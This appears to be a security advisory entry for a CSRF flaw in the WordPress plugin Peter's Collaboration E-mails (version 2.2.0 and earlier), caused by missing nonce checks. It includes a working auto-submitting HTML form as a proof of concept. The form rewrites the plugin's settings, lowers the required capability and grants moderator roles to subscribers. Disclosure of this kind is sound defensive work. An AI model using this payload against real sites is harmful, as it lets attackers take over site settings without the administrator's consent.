Peter’s Collaboration E-mails <= 2.2.0 - Arbitrary Settings Update via CSRF

2022-05-2300:00:00

Daniel Ruf

0.001 Low

EPSS

Percentile

26.3%

JSON

The plugin is vulnerable to CSRF due to missing nonce checks. This allows the change of its settings, which can be used to lower the required user level, change texts, the used email address and more.

<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
    <input type="text" name="pce_blogname" value="hacked">
    <input type="text" name="pce_fromaddress" value="[email protected]">
    <input type="text" name="pce_fromname" value="hacked">
    <input type="text" name="pce_whoapproved" value="1">
    <input type="text" name="pce_contributor_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="administrator">
    <input type="text" name="pce_moderator_roles[]" value="author">
    <input type="text" name="pce_moderator_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="editor">
    <input type="text" name="pce_moderator_roles[]" value="subscriber">
    <input type="text" name="pce_emails_to_send[]" value="pending">
    <input type="text" name="pce_emails_to_send[]" value="approved">
    <input type="text" name="pce_emails_to_send[]" value="future">
    <input type="text" name="pce_emails_to_send[]" value="backtodraft">
    <input type="text" name="pce_emails_to_send[]" value="wentlive">
    <input type="text" name="pce_emails_to_send[]" value="private_to_published">
    <input type="text" name="pce_emails_to_send[]" value="edited">
    <input type="text" name="pce_required_capability" value="level_0">
    <input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
    document.getElementById("test").submit();
</script>

0.001 Low

EPSS

Percentile

26.3%

JSON

Related for WPEX-ID:31B413E1-D4B5-463E-9910-37876881C062